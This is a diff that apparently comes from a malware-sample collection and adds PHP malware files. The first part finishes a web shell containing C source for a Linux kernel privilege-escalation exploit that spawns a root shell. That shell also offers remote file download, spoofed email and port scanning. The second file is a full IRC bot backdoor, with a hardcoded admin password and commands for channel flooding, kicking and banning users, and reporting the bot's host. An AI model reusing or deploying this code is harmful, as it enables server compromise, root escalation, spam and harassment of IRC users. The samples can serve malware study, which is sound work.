" }\n" . + " tmp = count = 0U;\n" . + " }\n" . + " addr += PAGE_SIZE;\n" . + " next(m, bit);\n" . + " }\n" . + " signal(SIGSEGV, SIG_DFL);\n" . + " if (address)\n" . + " return;\n" . + " errno = ENOTSUP;\n" . + " fatal(\"Unable to determine kernel address\");\n" . + "}\n" . + "int modify_ldt(int, void *, unsigned);\n" . + "void ldt(unsigned * m)\n" . + "{\n" . + " struct modify_ldt_ldt_s l;\n" . + " map(m);\n" . + " memset(&l, 0, sizeof(l));\n" . + " l.entry_number = LDT_ENTRIES - 1;\n" . + " l.seg_32bit = 1;\n" . + " l.base_addr = MAGIC >> 16;\n" . + " l.limit = MAGIC & 0xffff;\n" . + " if (modify_ldt(1, &l, sizeof(l)) == -1)\n" . + " fatal(\"Unable to set up LDT\");\n" . + " l.entry_number = ENTRY_MAGIC / 2;\n" . + " if (modify_ldt(1, &l, sizeof(l)) == -1)\n" . + " fatal(\"Unable to set up LDT\");\n" . + " find(m);\n" . + "}\n" . + "asmlinkage void kernel(unsigned * task)\n" . + "{\n" . + " unsigned * addr = task;\n" . + " /* looking for uids */\n" . + " while (addr[0] != uid || addr[1] != uid ||\n" . + " addr[2] != uid || addr[3] != uid)\n" . + " addr++;\n" . + " addr[0] = addr[1] = addr[2] = addr[3] = 0; /* uids */\n" . + " addr[4] = addr[5] = addr[6] = addr[7] = 0; /* uids */\n" . + " addr[8] = 0;\n" . + " /* looking for vma */\n" . + " for (addr = (unsigned *) task_size; addr; addr++) {\n" . + " if (addr[0] >= task_size && addr[1] < task_size &&\n" . + " addr[2] == address && addr[3] >= task_size) {\n" . + " addr[2] = task_size - PAGE_SIZE;\n" . + " addr = (unsigned *) addr[3];\n" . + " addr[1] = task_size - PAGE_SIZE;\n" . + " addr[2] = task_size;\n" . + " break;\n" . + " }\n" . + " }\n" . + "}\n" . + "void kcode(void);\n" . + "#define __str(s) #s\n" . + "#define str(s) __str(s)\n" . + "void __kcode(void)\n" . + "{\n" . + " asm(\n" . + " \"kcode: \\n\"\n" . + " \" pusha \\n\"\n" . + " \" pushl %es \\n\"\n" . + " \" pushl %ds \\n\"\n" . + " \" movl $(\" str(DS) \") ,%edx \\n\"\n" . + " \" movl %edx,%es \\n\"\n" . + " \" movl %edx,%ds \\n\"\n" . + " \" movl $0xffffe000,%eax \\n\"\n" . + " \" andl %esp,%eax \\n\"\n" . + " \" pushl %eax \\n\"\n" . + " \" call kernel \\n\"\n" . + " \" addl $4, %esp \\n\"\n" . + " \" popl %ds \\n\"\n" . + " \" popl %es \\n\"\n" . + " \" popa \\n\"\n" . + " \" lret \\n\"\n" . + " );\n" . + "}\n" . + "void knockout(void)\n" . + "{\n" . + " unsigned * addr = (unsigned *) address;\n" . + " if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)\n" . + " fatal(\"Unable to change page protection\");\n" . + " errno = ESRCH;\n" . + " if (addr[ENTRY_MAGIC] != MAGIC)\n" . + " fatal(\"Invalid LDT entry\");\n" . + " /* setting call gate and privileged descriptors */\n" . + " addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);\n" . + " addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;\n" . + " addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */\n" . + " addr[ENTRY_CS+1] = 0x00cf9a00U;\n" . + " addr[ENTRY_DS+0] = 0x0000ffffU; /* user 4GB code at 0x00000000 */\n" . + " addr[ENTRY_DS+1] = 0x00cf9200U;\n" . + " prepare();\n" . + " if (setjmp(jmp) != 0) {\n" . + " errno = ENOEXEC;\n" . + " fatal(\"Unable to jump to call gate\");\n" . + " }\n" . + " asm(\"lcall $\" str(GATE) \",$0x0\"); /* this is it */\n" . + "}\n" . + "void shell(void)\n" . + "{\n" . + " char * argv[] = { _PATH_BSHELL, NULL };\n" . + " execve(_PATH_BSHELL, argv, environ);\n" . + " fatal(\"Unable to spawn shell\\n\");\n" . + "}\n" . + "void remap(void)\n" . + "{\n" . + " static char stack[8 MB]; /* new stack */\n" . + " static char * envp[] = { \"PATH=\" _PATH_STDPATH, NULL };\n" . + " static unsigned * m;\n" . + " static unsigned b;\n" . + " m = (unsigned *) sbrk(map_size);\n" . + " if (!m)\n" . + " fatal(\"Unable to allocate memory\");\n" . + " environ = envp;\n" . + " asm (\"movl %0, %%esp\\n\" : : \"a\" (stack + sizeof(stack)));\n" . + " b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK;\n" . + " if (munmap((void*)b, task_size - b) == -1)\n" . + " fatal(\"Unable to unmap stack\");\n" . + " while (b < task_size) {\n" . + " if (sbrk(PAGE_SIZE) == NULL)\n" . + " fatal(\"Unable to expand BSS\");\n" . + " b += PAGE_SIZE;\n" . + " }\n" . + " ldt(m);\n" . + " expand();\n" . + " knockout();\n" . + " shell();\n" . + "}\n" . + "int main(void)\n" . + "{\n" . + " configure();\n" . + " remap();\n" . + " return EXIT_FAILURE;\n" . + "}\n"; + + $fp = fopen("/tmp/xpl_brk.c", "w"); + $ok = fwrite($fp, $kernel); + + if (!empty($ok)) { + echo "
    [*] Linux Local Kernel Exploit Was Successfuly Copied
    "; + } else { + echo "
    [-] An Error Has Ocurred While Copying Kernel Exploit
    "; + } + } + +?> +
    +
    
    +";
    +  echo ""; 
    +}
    +
    +// Function to Dowload Local Xploite Binary COde or Source Code
    +
    +if ($dx != "") {
    +  $fp = @fopen("$hostxpl",r);
    +  $fp2 = @fopen("$storage","w");
    +  fwrite($fp2, "");
    +  $fp1 = @fopen("$storage","a+");
    +  for (;;) {
    +    $read = @fread($fp, 4096);
    +    if (empty($read)) break;
    +    $ok = fwrite($fp1, $read);
    +    
    +    if (empty($ok)) {
    +      echo "
    [-] An Error Has Ocurred While Uploading File
    "; + break; + } + } + + if (!empty($ok)) { + echo "
    [*] File Was Successfuly Uploaded
    "; + } +} + +flush( ); + +// Function to visulize Format Color Source Code PHP + +if ($sfc != "") { + $showcode = show_source("$sfc"); + echo " $showcode "; +} + +// Function to Visualize all infomation files +if ($fileinfo != "") { + $infofile = stat("$fileanalize"); + while (list($info, $value) = each ($infofile)) { + echo" Info: $info Value: $value
    "; + } +} + +// Function to send fake mail +if ($fake == 1) { + echo "
    "; + echo "Your Fake Mail
    "; + echo "Your Cavy:
    "; + echo "Suject:
    "; + echo "Text:
    "; + echo "
    "; + echo ""; + echo "
    "; +} + +if($send == 1) { + if (mail($cavy, $subject, $body, "From: $yourmail\r\n")) { + echo "
    [*] Mail Send Sucessfuly
    "; + } else { + echo "
    [-] An Error Has Ocurred While Sending Mail
    "; + } +} + +if ($portscan != "") { + $port = array ("21","22","23","25","110",); + $values = count($port); + for ($cont=0; $cont < $values; $cont++) { + @$sock[$cont] = Fsockopen($SERVER_NAME, $port[$cont], $oi, $oi2, 1); + $service = Getservbyport($port[$cont],"tcp"); + @$get = fgets($sock[$cont]); + echo "
    Port: $port[$cont] - Service: $service

    "; + echo "
    Banner: $get

    "; + flush(); + } +} + +?> +
    \ No newline at end of file diff --git a/PHP/Backdoor.PHP.IRCBot.b b/PHP/Backdoor.PHP.IRCBot.b new file mode 100644 index 00000000..7298dd70 --- /dev/null +++ b/PHP/Backdoor.PHP.IRCBot.b @@ -0,0 +1,640 @@ + +", +" :P~", +" :D", +",", +".", +"a", +"i", +"u", +"e", +"o", +"z", +"v", +"z", +"x", +"c", +"p", +"m", +"t", +"k", +"b", +"s", +"u", +"bot", +"g", +"lo", +"jo", +"lol" +); +$tsu1=array("`","|","[","]","{","}","^","_"); +$tsu2=array("`","|","[","]","{","}","^","-","\\","_"); +$nicky=array( + "kaiyoooooo", + "arieeee", + "neotechhh", + "gielahh", + "sashaimoet", + "raracantixs", + "iimgituloch", + "aweGspots", + "tukiyemsss", + "CZzzzzz", + "gunturaja", + "coepiddd", + "shymphonixs", + "kemplungggg", + "eillennnss", + "sebelumcahayaa", + "cecep`gorbachev", + "Kuba`Saku", + "Kisi`Mura", + "weduslucuuuu", + "chodileeeaja", + "YusiKita", + "shymphonix", + "cantikmaisya", + "gracenatalie", + "gukongsss", + "gugunacehh", + "rocheeeee", + "cupidsoloo", + "namakam", + "chynthya", + "MukamuSadaki", + "MasimudaMasupi", + "Akubukaumasuki", + "Daryuss", + "kudi`san", + "TyadaRumah", + "nick5aja", + "po", + "salehooo", + "reebodd", + "Sukiatasi", + "Bg3pl", + "sashaaa", + "legowooozz", + "adeetttt", + "aweeeeezz", + "Defansaku", + "Mama`mia`", + "Gramws", + "valent`Rocsi", + "jinak`", + "kabayannnn", + "Pikachu`", + "Kiwrju", + "heruuuuu", + "reno", + "angklung", + "Cootex", + "Cononge", + "heriiiiii", + "Ampow", + "pingggg", + "payahhhhhh", +); +$usr1=array( +"EnglandChanss", +); + +$nick = $nicky[rand(0,count($nicky) - 1)]; +$awaymsg = " "; +$identify = ''; +$Admin = 'dodolz'; +$BOT_PASSWORD = 'servorum'; +$channels = '#england'; +$remotehst2= array("irc.telkom.net.id"); +$remotehost= $remotehst2[rand(0,count($remotehst2) - 1)]; +$port = '6667'; +$realname = $nick; +$counterfp = 0; +$channels = str_replace("CNL","#",$channels); +print ""; +print "== Connecting to $remotehost..."; + + +$raway = "on"; +$log = "off"; +$saway = "1"; +if (!$stime) { $stime = time(); } +if (!$port) { $port = "6666"; } +$Admin = strtolower($Admin); +$auth = array($Admin => array("name" => $Admin, "pass" => $BOT_PASSWORD, "auth" => 1,"status" => "Admin")); + +$username = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)]; +$keluar = 0; +$akill = 1; +$katime = 0; +$localhost = 'localhost'; +$dayload = date("H:i:s d/m/Y"); +ini_set('user_agent','MSIE 5\.5;'); +set_time_limit(0); +define ('CRL', "\r\n"); +$channels = strtolower($channels)." "; +$channel = explode(" ", $channels); + +do { + $fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 30); + if(!$fp) { + if ( $counterfp <= 200 ) { + $counterfp = $counterfp+1; + working($nick); + } + else { + print "
    Cannot connect to $remotehost!
    Please Try Another Server!
    "; + $keluar = 1; + exit; + } + } + print "
    == Suceeded connection"; + $Header = 'NICK '.$nick . CRL; + $Header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL; + fputs($fp, $Header); + $response = ''; + while (!feof($fp)) { + $response .= fgets($fp, 1024); + while (substr_count($response,CRL) != 0) { + $offset = strpos($response, CRL); + $data = substr($response,0,$offset); + $response = substr($response,$offset+2); + if (substr($data,0,1) == ':') { + $offsetA = strpos($data, ' '); + $dFrom = substr($data,1,$offsetA-1); + $offsetB = strpos($data, ' :'); + $dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1); + $offsetC = strpos($data, '!'); + $dNick = substr($data,1,$offsetC-1); + $iText = substr($data,$offsetB+2); + if ( substr($dCommand,0,3) == '004' ) { + fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL); + if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); } + fputs($fp, 'NOTICE ' . $Admin . ' :Halo bos besar!' . CRL); + foreach ($channel as $v) { + fputs($fp, 'JOIN ' .$v . CRL); + } + $pong1 = '1'; + } + elseif (substr($dCommand,0,3)=='465') { + print "
    == This bot have been autokilled."; + $akill = 2; + } + elseif (substr($dCommand,0,3)=='433') { + $nick = $nicky[rand(0,count($nicky) - 1)]; + fputs($fp, 'NICK '.$nick . CRL); + } + elseif (substr($dCommand,0,3)=='432') { + $nick = $nick.$username; + fputs($fp, 'NICK '.$nick . CRL); + } + if (eregi('.dal.net',$dNick) && $akill==2) { + if (eregi('AKILL ID:',$data) || eregi('Your hostmask is',$data) || eregi('Your IP is',$data)) { + print "
    ".strstr($data,'***')." "; + if (eregi('Your IP is',$data)) { + $keluar = 1; + exit; + } + } + } + $dcom = explode(" ", $dCommand); + $dNick = strtolower($dNick); + if ($dcom[0]=='KICK' && $dcom[2]==$nick) { + fputs($fp, 'JOIN ' .$dcom[1]. CRL); + } + elseif ($dcom[0]=='NICK' || $dcom[0]=='QUIT' || $dcom[0]=='PART') { + if ($auth["$dNick"]) { + if ($auth["$dNick"]["pass"]) { + if ($auth["$dNick"]["auth"]==2) { + + if ($dcom[0]=='NICK') { + $com = explode(" ", $data); + $chnick = strtolower(str_replace(':','',$com[2])); + if ($dNick!=$chnick) { + $auth["$dNick"]["auth"] = 1; + fputs($fp,'NOTICE '.$chnick.' :selamat istirahat bos! ' . CRL); + } + } else { $auth["$dNick"]["auth"] = 1; fputs($fp,'NOTICE '.$dNick.' :selamat istirahat bos! ' . CRL); } + } + } else { fputs($fp,'NOTICE ' . $dNick . ' :pass your pass ' . CRL); } + } + } + elseif ($dcom[0]=='307' && strtolower($dcom[2])==$whois) { + $dcom[2] = strtolower($dcom[2]); + if ($auth["$dcom[2]"]) { + if ($auth["$dcom[2]"]["pass"]) { + if ($auth["$dcom[2]"]["auth"]==1) { + $auth["$dcom[2]"]["auth"] = 2; $whois = ""; + fputs($fp,'NOTICE ' . $dcom[2] . ' :kamu masukan password as '.$auth["$dcom[2]"]["status"].' of this bot! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dcom[2] . ' :password oke bos aChOnGs seep emuach di titid! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Pass Not Set Yet! Type: pass To Set Your Own Password then Auth Again ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); } + } + elseif ($dcom[0]=='NOTICE') { + $com = explode(" ", $data); + if ($com[3]==':_KB' && $com[4] && $com[5] && $com[6]) { + $msg = str_replace('_','',$data); + $msg = strstr($msg,":KB"); + $msg = str_replace(":KB $com[4]","",$msg); + fputs($fp, 'KICK '.$com[4].' '.$com[5].' :'.$msg . CRL); + fputs($fp, 'MODE '.$com[4].' +b *!*'.$com[6] . CRL); + } + } + elseif ($dcom[0]=='PRIVMSG') { + $com = explode(" ", $data); + if ($com[3]==':_VERSION_') { + fputs($fp,'NOTICE '.$dNick.' :'.chr(1).'VERSION mIRC v6.16 Khaled Mardam-Bey'.chr(1) . CRL); + } + elseif ($auth["$dNick"]["status"] && $com[3]==':auth' && $com[4]) { + if ($auth["$dNick"]) { + if ($auth["$dNick"]["pass"]) { + if ($auth["$dNick"]["auth"]==1) { + if ($com[4]===$auth["$dNick"]["pass"]) { + $auth["$dNick"]["auth"] = 2; + fputs($fp,'NOTICE ' . $dNick . ' :kamu masukkan password as '.$auth["$dNick"]["status"].' of this bot! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :passworde salah syu! Auth salah Shu! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :password bener bos aChOnGs emang oke! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass To Set Your Own Password then Auth Again ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':deauth') { + if ($auth["$dNick"]) { + if ($auth["$dNick"]["pass"]) { + if ($auth["$dNick"]["auth"]==2) { + $auth["$dNick"]["auth"] = 1; + fputs($fp,'NOTICE ' . $dNick . ' :You`re LogOut! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :You`re Already LogOut! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass To Set Your Own Password then Auth Again ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':pass' && $com[4]) { + + if ($auth["$dNick"]) { + if (!$auth["$dNick"]["pass"]) { + $auth["$dNick"]["pass"] = $com[4]; + $auth["$dNick"]["auth"] = 1; + fputs($fp,'NOTICE ' . $dNick . ' :Your Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth To Authorized Imediately! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Already Set! Type: auth To Get Authorized ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':chgpass' && $com[4] && $com[5]) { + if ($auth["$dNick"]) { + if ($auth["$dNick"]["auth"]==2) { + if ($com[4]===$auth["$dNick"]["pass"]) { + $auth["$dNick"]["pass"] = $com[5]; + fputs($fp,'NOTICE ' . $dNick . ' :Your New Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth To Authorized Imediately! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :Your Old Pass Wrong! Type: chgpass To Change Your Auth Pass ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth To Authorized ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':adduser' && $com[4] && $com[4]!=$nick && $com[5]) { + $com[4] = strtolower($com[4]); + if ($auth["$dNick"]["auth"]==2) { + if ($auth["$dNick"]["status"]=="Admin") { + if ($com[5]=="master" || $com[5]=="user") { + $auth["$com[4]"]["name"] = $com[4]; + $auth["$com[4]"]["status"] = $com[5]; + fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL); + fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass To Set Your Pass ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :salah Command! Type: adduser ' . CRL); } + } elseif ($auth["$dNick"]["status"]=="master") { + if (!$auth["$com[4]"]) { + if ($com[5]=="user") { + $auth["$com[4]"]["name"] = $com[4]; + $auth["$com[4]"]["status"] = $com[5]; + fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL); + fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass user ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :User Already Exist! Aborting AddUser! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth To Authorized ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':deluser' && $com[4]) { + $com[4] = strtolower($com[4]); + if ($auth["$dNick"]["auth"]==2) { + if ($auth["$dNick"]["status"]=="Admin") { + if ($auth["$com[4]"]["status"]=="master" || $auth["$com[4]"]["status"]=="user") { + unset($auth["$com[4]"]); + fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL); + fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser ' . CRL); } + } elseif ($auth["$dNick"]["status"]=="master") { + if ($auth["$com[4]"]["status"]=="user") { + unset($auth["$com[4]"]); + fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL); + fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth To Authorized ' . CRL); } + } + elseif ($auth["$dNick"]["status"]) { + if (ereg(":`",$com[3]) || ereg(":!",$com[3])) { + $chan = strstr($dCommand,"#"); + $anick = str_replace("PRIVMSG ","",$dCommand); + if ($com[3]==':!auth') { + if ($auth["$dNick"]["auth"]==2) { + fputs($fp,'NOTICE '.$dNick.' :Jembutz..! You`re already Authorized!' . CRL); + } else { + $whois = $dNick; + fputs($fp,'WHOIS '.$dNick . CRL); + } + } elseif ($com[3]==':`auth' && $chan) { + if ($auth["$dNick"]["auth"]==2) { + fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' Hamba siap mencari janda Bos!' . CRL); + } else { fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' Raimu bukan bosku cok!' . CRL); } + } elseif ($auth["$dNick"]["auth"]==2) { + if ($com[3]==':`say' && $com[4] && $chan) { + $msg = strstr($data,":`say"); + $msg = str_replace(":`say ","",$msg); + fputs($fp,'PRIVMSG '.$chan.' :'.$msg. CRL); + } + elseif ($com[3]==':`act' && $com[4] && $chan) { + $msg = strstr($data,":`act"); + $msg = str_replace(":`act ","",$msg); + fputs($fp,'PRIVMSG '.$chan.' :_ACTION '.$msg.'_'. CRL); + } + elseif ($com[3]==':`slap' && $com[4] && $chan) { + fputs($fp,'PRIVMSG '.$chan.' :_ACTION slaps '.$com[4].' Jembut Raimu wani karo bosku around a bit with a large trout_'. CRL); + } + elseif ($com[3]==':`msg' && $com[4] && $com[5]) { + $msg = strstr($data,":`msg"); + $msg = str_replace(":`msg $com[4] ","",$msg); + fputs($fp,'PRIVMSG '.$com[4].' :'.$msg. CRL); + } + elseif ($com[3]==':`notice' && $com[4] && $com[5]) { + $msg = strstr($data,":`notice"); + $msg = str_replace(":`notice $com[4] ","",$msg); + fputs($fp,'NOTICE '.$com[4].' :'.$msg. CRL); + } + elseif ($com[3]==':`ctcp' && $com[4] && $com[5]) { + $msg = strstr($data,":`ctcp"); + $msg = str_replace(":`ctcp $com[4] ","",$msg); + fputs($fp,'PRIVMSG '.$com[4].' :_'.$msg.'_'. CRL); + } + elseif ($com[3]==':`ping' && $chan) { + $sml = $smile[rand(0,count($smile) - 1)]; + fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PONG!_ '.$sml. CRL); + } + elseif ($com[3]==':`pong' && $chan) { + $sml = $smile[rand(0,count($smile) - 1)]; + fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PING!_ '.$sml. CRL); + } + elseif ($com[3]==':`info' && $auth["$dNick"]["status"]=="Admin") { + $bhost = $_SERVER['HTTP_HOST']; + $bphp = $_SERVER['PHP_SELF']; + fputs($fp,'NOTICE '.$dNick.' :Bot Host: '.$bhost.', Bot PHP: '.$bphp. CRL); + } + elseif ($com[3]==':`up' && $chan) { + fputs($fp, 'PRIVMSG chanserv@services.dal.net :op '.$chan.' '.$nick . CRL); + } + elseif ($com[3]==':`down' && $chan) { + fputs($fp, 'MODE '.$chan.' +v-o '.$nick.' '.$nick . CRL); + } + elseif ($com[3]==':`tsunami' && $com[4] && $auth["$dNick"]["status"]!="user") { + $nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)]; + fputs($fp, 'NICK '.$nicktsu . CRL); + if (substr($dCommand,0,3)=='433') { + $nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)]; + fputs($fp, 'NICK '.$nicktsu . CRL); + } + $msg = strstr($data,":`tsunami"); + $msg = str_replace(":`tsunami $com[4]","",$msg); + if (ereg("#", $com[4])) { + fputs($fp, 'JOIN '.$com[4] . CRL); + } + fputs($fp, 'PRIVMSG '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL); + fputs($fp, 'NOTICE '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL); + fputs($fp, 'PRIVMSG '.$com[4].' :_TSUNAMI _'.$msg.'_____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL); + fputs($fp, 'PRIVMSG '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL); + fputs($fp, 'NOTICE '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL); + fputs($fp, 'PRIVMSG '.$com[4].' :_FLOOD _'.$msg.'_____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL); + if (ereg("#", $com[4])) { + fputs($fp, 'PART '.$com[4].' :Complete' . CRL); + fputs($fp, 'NICK '.$nick . CRL); + } else { + fputs($fp, 'NICK '.$nick . CRL); + } + } + elseif ($com[3]==':`cycle' && $chan && $auth["$dNick"]["status"]!="user") { + $msg = strstr($data,":`cycle"); + if (ereg("#", $com[4])) { + $partchan = $com[4]; + $msg = str_replace(":`cycle $com[4]","",$msg); + } else { + $partchan = $chan; + $msg = str_replace(":`cycle","",$msg); + } + if (strlen($msg)<3) { + $msg = ''; + } + fputs($fp, 'PART '.$partchan.' :_'.$msg . CRL); + fputs($fp, 'JOIN '.$partchan . CRL); + } + elseif ($com[3]==':`part' && $auth["$dNick"]["status"]=="Admin") { + $msg = strstr($data,":`part"); + if (ereg("#", $com[4])) { + $partchan = $com[4]; + $msg = str_replace(":`part $com[4]","",$msg); + } else { + $partchan = $chan; + $msg = str_replace(":`part","",$msg); + } + if (strlen($msg)<3) { + $msg = ''; + } + fputs($fp, 'PART '.$partchan.' :_'.$msg . CRL); + $remchan = strtolower($partchan); + if (in_array($remchan, $channel)) { + $channels = str_replace("$remchan ","",$channels); + unset($channel); + $channel = explode(" ", $channels); + } + + foreach ($channel as $v) { + fputs($fp, 'JOIN '.$v . CRL); + } + } + elseif ($com[3]==':`join' && $com[4] && $auth["$dNick"]["status"]=="Admin") { + if (!ereg("#",$com[4])) { $com[4]="#".$com[4]; } + $addchan = strtolower($com[4]); + if (!in_array($addchan, $channel)) { + $channel[]=$addchan; + $channels.="$addchan "; + } + foreach ($channel as $v) { + sleep(rand(1,6)); + fputs($fp, 'JOIN '.$v . CRL); + } + } + elseif ($com[3]==':`botnick' && $com[4] && !$chan && $auth["$dNick"]["status"]=="Admin") { + $nick = $com[4]; + $identify = $com[5]; + fputs($fp, 'NICK '.$nick . CRL); + fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL); + } + elseif ($com[3]==':`k' && $com[4] && $chan) { + $msg = strstr($data,":`k"); + $msg = str_replace(":`k $com[4]","",$msg); + fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL); + } + elseif ($com[3]==':`kb' && $com[4] && $chan) { + $msg = strstr($data,":`kb"); + $msg = str_replace(":`kb $com[4]","",$msg); + fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL); + fputs($fp, 'MODE '.$chan.' +b '.$com[4] . CRL); + } + elseif ($com[3]==':`ganti') { + $nick = $nicky[rand(0,count($nicky) - 1)]; + fputs($fp, 'NICK '.$nick . CRL); + if (substr($dCommand,0,3)=='433') { + $nick = $nicky[rand(0,count($nicky) - 1)]; + fputs($fp, 'NICK '.$nick . CRL); + } + } + elseif ($com[3]==':`op' && $chan) { + if ($com[4]) { $opnick = $com[4]; } + else { $opnick = $dNick; } + fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL); + } + elseif ($com[3]==':`deop' && $chan) { + if ($com[4]) { $opnick = $com[4]; } + else { $opnick = $dNick; } + fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL); + } + elseif ($com[3]==':`v' && $chan) { + if ($com[4]) { $vonick = $com[4]; } + else { $vonick = $dNick; } + fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL); + } + elseif ($com[3]==':`dv' && $chan) { + if ($com[4]) { $vonick = $com[4]; } + else { $vonick = $dNick; } + fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL); + } + elseif ($com[3]==':`awaymsg' && $auth["$dNick"]["status"]=="Admin") { + $msg = strstr($data,":`awaymsg"); + $msg = str_replace(":`awaymsg","",$msg); + if (strlen($msg)<3) { + $raway="on"; + fputs($fp,'AWAY : ' . 'AWAY' . CRL); + } else { + $raway="off"; + fputs($fp,'AWAY : ' . $msg . CRL); + } + } + elseif ($com[3]==':`mode' && $com[4] && $chan) { + fputs($fp, 'MODE '.$chan.' :'.$com[4].' '.$com[5] . CRL); + } + elseif ($com[3]==':`nickmode' && $com[4]) { + $nickmode = $com[4]; + fputs($fp, 